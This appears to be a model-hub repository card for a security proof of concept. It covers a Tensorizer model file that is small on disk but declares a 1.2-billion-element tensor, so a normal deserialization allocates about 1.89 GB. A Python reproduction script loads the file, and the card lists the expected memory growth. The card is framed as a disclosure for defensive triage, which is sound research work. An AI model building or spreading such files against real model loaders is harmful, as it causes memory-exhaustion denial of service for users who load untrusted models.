Tensorizer zero-data shape amplification PoC

This repository contains a benign security research proof of concept for a Tensorizer model file that remains small on disk but drives large memory allocation during normal deserialization.

Files:

  • tensorizer-huge-shape-zero-meta.tensors
  • build_poc.py

Reproduction:

OPENBLAS_NUM_THREADS=1 OMP_NUM_THREADS=1 MKL_NUM_THREADS=1 /usr/bin/time -v \
python3 - <<'PY'
from tensorizer.serialization import TensorDeserializer

d = TensorDeserializer("tensorizer-huge-shape-zero-meta.tensors", num_readers=1)
t = d.get("w")
print("shape", tuple(t.shape), "dtype", t.dtype, "numel", t.numel())
d.close()
PY

Expected observable:

  • the loader returns a tensor with shape (1200000000,)
  • peak RSS grows to roughly 1.89 GB on the test machine

This repository is for defensive security validation and triage only.

Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support